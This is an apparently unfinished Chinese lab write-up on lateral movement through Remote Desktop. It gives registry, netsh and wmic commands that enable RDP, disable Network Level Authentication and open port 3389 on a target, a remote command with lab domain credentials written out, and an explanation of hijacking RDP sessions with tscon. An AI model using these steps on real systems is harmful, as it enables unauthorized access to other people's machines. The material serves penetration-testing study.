内网横向——远程桌面利用


网络拓扑:
在这里插入图片描述
攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

一、远程桌面的确定和开启

下面的使用在win 7和win server 2008之间做。

1、通过查询注册表来确定当前主机是否开启了远程桌面功能,命令如下:

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

如字段为0x0,则说明RDP服务已开启;若为0x1,则说明RDP服务已禁用。
在这里插入图片描述
2、执行以下命令可本地开启远程桌面。

# 若未开启RDP服务,开启远程桌面连接功能
# 未成功的话,可能需要管理员权限
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# 关闭“仅允许允许使用网络级别身份验证的远程主机的计算机连接”(鉴权)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0
# 设置防火墙策略,放行3389端口
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow 

在这里插入图片描述
3、对于远程主机(192.168.52.138),可以使用WMI来开启远程桌面功能:

wmic /Node:192.168.52.138 /User:god\liukaifeng01 /Password:hongrisec@2024. RDTOGGLE WHERE Servername="owa" call SetAllowTSConnections 1

在这里插入图片描述
在这里插入图片描述

hostname # 查看主机名

在这里插入图片描述

二、RDP Hijacking

对于开启远程桌面连接的windows计算机,当多个用户进行登录时,会产生多个会话。渗透测试人员可以通过已获取的SYSTEM权限劫持其他用户的RDP会话,并在未授权的情况下登录目标系统,即便该用户的会话已断开。这种攻击方式被称为“RDP Hijacking”。

远程桌面劫持需要获取系统SYSTEM权限并执行tscon命令。原理:tscon命令提供了一个会话的功能。正常情况下,切换会话需要提供目标用户的登录密码,但在SYSTEM权限下可以完全绕过验证,不输入密码即可切换到目标用户的会话。从而实现未授权登录。

本实验在kali和win 7上完成。

1、首先kali通过rdesktop连接win7。

rdesktop 192.168.111.128

环境有问题,待续。。。。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值